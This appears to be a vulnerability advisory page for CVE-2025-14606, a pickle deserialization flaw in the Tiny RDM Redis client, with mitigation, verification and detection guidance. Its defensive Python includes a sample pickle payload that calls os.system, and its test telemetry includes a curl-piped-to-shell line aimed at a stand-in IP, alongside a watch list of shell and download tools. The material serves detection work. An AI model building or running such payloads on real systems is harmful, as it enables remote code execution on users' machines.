CVE-2025-14606

5.0 MEDIUM

📋 TL;DR

Tiny RDM's pickle decoder (pickle.loads in pickle_convert.go) deserializes untrusted data insecurely. Because Tiny RDM is a desktop Redis client, the attacker-controlled input is a crafted value read from a Redis server the user connects to and decodes as pickle; successful exploitation gives code execution as the user running the client. Versions up to and including 1.2.5 are affected.

💻 Affected Systems

Products:
  • Tiny RDM (vendor: tiny-rdm), a desktop Redis GUI client
Versions: Up to and including version 1.2.5
Operating Systems: All desktop platforms Tiny RDM ships for (Windows, macOS, Linux)
Default Config Vulnerable: ⚠️ Yes
Notes: The pickle decoder is part of the client and no setting disables it, so every affected version is exposed regardless of configuration. Exposure still requires the client to decode attacker-controlled Redis data as pickle.

⚠️ Manual Verification Required

This CVE does not have machine-readable version information in our database, so automatic vulnerability detection cannot determine if your system is affected.

Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD). The "up to and including 1.2.5" range under Affected Systems is stated in the vulnerability description rather than in structured version data, so confirm it manually against your installation.


Recommended Actions:
  1. Review the CVE details at NVD
  2. Check vendor security advisories for your specific version
  3. Test if the vulnerability is exploitable in your environment
  4. Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴 Worst Case

Code execution as the user running Tiny RDM, leading to complete compromise of the workstation, theft of data and saved Redis connection details, and lateral movement to the servers that workstation can reach.

🟠 Likely Case

Code execution with the privileges of the tiny-rdm process, i.e. the interactive user's desktop session, exposing that user's data and giving the attacker a foothold for further exploitation.

🟢 If Mitigated

Limited impact if the client only connects to Redis instances whose writers are trusted and runs with least privilege, though a crafted value can still crash the client or otherwise disrupt the user's session.

🌐 Internet-Facing: HIGH - The exposed surface is not the client but the Redis servers it connects to: anyone who can write a value to an Internet-reachable Redis instance, or who runs a malicious server the user connects to, can deliver the payload, and the exploit is public.
🏢 Internal Only: MEDIUM - Still vulnerable, but the attacker first needs write access to a Redis instance the user inspects, or a position to serve one, which is a smaller attack surface than an Internet-facing data store.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: MEDIUM

A proof of concept has been published. The attacker does not authenticate to the victim, but still needs to get a crafted pickle value in front of the client, typically by writing it to a Redis key the victim later opens with the pickle decoder, which is why complexity is rated medium.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: Not available

Restart Required: Yes

Instructions:

1. Monitor the tiny-rdm GitHub repository for security updates.
2. When a patched version becomes available, upgrade immediately.
3. Restart the Tiny RDM application after patching so the old binary is no longer loaded.

🔧 Temporary Workarounds

Network Isolation

Platform: all

Tiny RDM is a client and does not listen on a port of its own, so inbound firewall rules do nothing here. The payload arrives in data read from Redis (port 6379 by default), so:

Only connect the client to Redis instances whose writers you trust, and use egress firewall rules on the workstation to block connections to untrusted Redis servers.

Process Isolation

Platform: linux

Run tiny-rdm with minimal privileges in a container or isolated environment. In the command below `tiny-rdm` is a placeholder image name, not a published image, and a containerised GUI client additionally needs a display forwarded to it.

docker run --read-only --cap-drop=ALL tiny-rdm

🧯 If You Can't Patch

  • Implement strict network segmentation so the workstation running Tiny RDM can only reach Redis instances whose writers are trusted
  • Treat pickle-encoded values as untrusted: do not decode values from Redis instances you do not control, and pre-scan any value for code-executing pickle opcodes (GLOBAL, STACK_GLOBAL, REDUCE, BUILD) before handing it to a decoder
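As an added example (not code from Tiny RDM or its maintainers), the following Python shows what that application-level validation looks like: a pre-scan that enumerates the opcodes of a pickle stream without executing it, and a restricted loader that refuses every global lookup. Both sample values are constructed here; `pickletools.genops` and the `find_class` override are standard-library features. Python rather than the project's Go is used because pickle's opcode vocabulary is a Python format and the tools to inspect it safely ship with the interpreter.

```python
import io
import os
import pickle
import pickletools

# Opcodes that import a name or call a callable. A pickle-based RCE payload needs
# at least one of them (typically GLOBAL/STACK_GLOBAL to fetch e.g. os.system,
# then REDUCE to call it). Plain data (dicts, lists, strings, numbers) never needs them.
CODE_EXEC_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
    "REDUCE", "BUILD", "EXT1", "EXT2", "EXT4",
}


def suspicious_opcodes(data: bytes) -> list:
    """Names of code-executing opcodes in `data`, found without unpickling it.

    pickletools.genops only walks the opcode stream; it never imports or calls
    anything, so it is safe on attacker-controlled bytes. A truncated or otherwise
    malformed stream raises ValueError, which is reported as a finding as well.
    """
    found = []
    try:
        for opcode, _arg, _pos in pickletools.genops(data):
            if opcode.name in CODE_EXEC_OPCODES:
                found.append(opcode.name)
    except ValueError:
        found.append("MALFORMED")
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Second line of defence: refuse every global lookup so only literal data can be built."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_loads(data: bytes):
    """Decode `data` only if the pre-scan is clean, and even then without global lookups."""
    findings = suspicious_opcodes(data)
    if findings:
        raise pickle.UnpicklingError(f"refusing to decode: {findings}")
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True when safe_loads refuses `data` (convenience wrapper for callers and tests)."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


# Constructed sample input (not captured from any real deployment).
# A benign cached value of the kind an application might keep in Redis:
BENIGN = pickle.dumps({"user": "alice", "roles": ["admin"], "ttl": 300}, protocol=4)


# ... and a payload of the kind used against pickle.loads: an object whose
# __reduce__ tells the unpickler to call os.system on load. pickle.dumps only
# serialises that instruction; nothing runs unless something unpickles the bytes.
class _Payload:
    def __reduce__(self):
        return (os.system, ("echo pwned",))


MALICIOUS = pickle.dumps(_Payload(), protocol=4)


if __name__ == "__main__":
    print("benign   :", suspicious_opcodes(BENIGN), "->", safe_loads(BENIGN))
    print("malicious:", suspicious_opcodes(MALICIOUS), "-> rejected:", is_rejected(MALICIOUS))
    print("truncated:", suspicious_opcodes(MALICIOUS[:-1]))
```

The scan is deliberately conservative: BUILD and the NEWOBJ family are flagged too, because setting attributes or constructing arbitrary classes is enough to reach code execution through gadget classes even without a direct REDUCE. If a legitimate value genuinely needs those opcodes it should be decoded in a sandbox, not in the GUI client.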

🔍 How to Verify

Check if Vulnerable:

Check the installed version in the application's About or settings view, or from the release you installed; a `tiny-rdm --version` invocation works only if your build's binary supports that flag. If the version is 1.2.5 or earlier, the system is vulnerable.

Check Version:

tiny-rdm --version

Verify Fix Applied:

After patching, confirm the installed version is later than 1.2.5, then exercise the pickle decoder on harmless test data you produced yourself to confirm it still works. Do not run the public proof of concept on a production workstation.

📡 Detection & Monitoring

Log Indicators:

  • Pickle decoding errors in the client's own logs on keys the user did not expect to contain pickle data
  • Child processes (shells, interpreters, download tools) spawned by the tiny-rdm process
  • Outbound connections from the workstation to suspicious external IPs shortly after a Redis value was viewed

Network Indicators:

  • Redis values containing pickle opcodes that import or call functions (GLOBAL, STACK_GLOBAL, REDUCE, BUILD) on keys that should hold plain data
  • Unexpected outbound connections from the tiny-rdm process to anything other than its configured Redis servers

SIEM Query:

process:tiny-rdm AND (event:deserialization_error OR process_spawn:unexpected)

This is a pseudo-query: map the field names onto your EDR or audit schema (for example parent process name and child image path).
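To make the "unexpected process spawn" and "unexpected outbound connection" indicators concrete, here is an added Python example (not from the project or any vendor) that runs those two checks over constructed JSON endpoint events. The event schema, the client process names, the watch list of child executables and the Redis allowlist are all assumptions to be mapped onto your own EDR or auditd data.

```python
import json
import os

# Process names the client may run under; adjust for your packaging (assumption).
CLIENT_NAMES = {"tiny-rdm", "Tiny RDM", "Tiny RDM.exe"}

# Children a Redis GUI client has no reason to launch. This list is an assumption,
# to be tuned against a clean baseline of what your install actually spawns.
SUSPICIOUS_CHILDREN = {
    "sh", "bash", "zsh", "dash", "cmd.exe", "powershell.exe", "pwsh",
    "curl", "wget", "nc", "ncat", "certutil.exe", "bitsadmin.exe",
}

# Redis endpoints the client is expected to talk to (assumption: site-specific allowlist).
KNOWN_REDIS = {("10.0.0.5", 6379), ("10.0.0.6", 6380)}


def _basename(path: str) -> str:
    # Normalise Windows and POSIX paths before comparing image names.
    return os.path.basename(path.replace("\\", "/"))


def _events(lines):
    for raw in lines:
        yield json.loads(raw)


def flag_spawns(lines):
    """(pid, cmdline) of watch-listed executables whose parent is the client."""
    return [
        (ev["pid"], ev["cmdline"])
        for ev in _events(lines)
        if ev.get("event") == "process_start"
        and _basename(ev.get("parent_exe", "")) in CLIENT_NAMES
        and _basename(ev.get("exe", "")) in SUSPICIOUS_CHILDREN
    ]


def flag_connections(lines):
    """(pid, dst_ip, dst_port) of client connections to anything but known Redis servers."""
    return [
        (ev["pid"], ev["dst_ip"], ev["dst_port"])
        for ev in _events(lines)
        if ev.get("event") == "net_connect"
        and _basename(ev.get("exe", "")) in CLIENT_NAMES
        and (ev["dst_ip"], ev["dst_port"]) not in KNOWN_REDIS
    ]


# Constructed sample telemetry (not captured from a real host); 198.51.100.0/24 is a
# documentation range. One benign Redis connection, one benign child (opening a URL),
# one shell spawned from the client, one unrelated shell, and one callback to an unknown host.
SAMPLE_LOG = [json.dumps(e) for e in [
    {"event": "net_connect", "pid": 4099, "exe": "/opt/tiny-rdm/tiny-rdm",
     "dst_ip": "10.0.0.5", "dst_port": 6379},
    {"event": "process_start", "pid": 4100, "ppid": 4099, "parent_exe": "/opt/tiny-rdm/tiny-rdm",
     "exe": "/usr/bin/xdg-open", "cmdline": "xdg-open https://example.com/"},
    {"event": "process_start", "pid": 4101, "ppid": 4099, "parent_exe": "/opt/tiny-rdm/tiny-rdm",
     "exe": "/usr/bin/sh", "cmdline": "sh -c 'curl http://198.51.100.7/x | sh'"},
    {"event": "process_start", "pid": 4102, "ppid": 1, "parent_exe": "/usr/lib/systemd/systemd",
     "exe": "/usr/bin/sh", "cmdline": "sh -c ls"},
    {"event": "net_connect", "pid": 4099, "exe": "/opt/tiny-rdm/tiny-rdm",
     "dst_ip": "198.51.100.7", "dst_port": 4444},
]]


if __name__ == "__main__":
    for hit in flag_spawns(SAMPLE_LOG):
        print("suspicious child of tiny-rdm:", hit)
    for hit in flag_connections(SAMPLE_LOG):
        print("unexpected connection from tiny-rdm:", hit)
```

The allowlist approach for connections is what makes the second check useful: a desktop Redis client has a small, known set of servers it should ever reach, so anything else from that process is worth an alert regardless of destination reputation.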
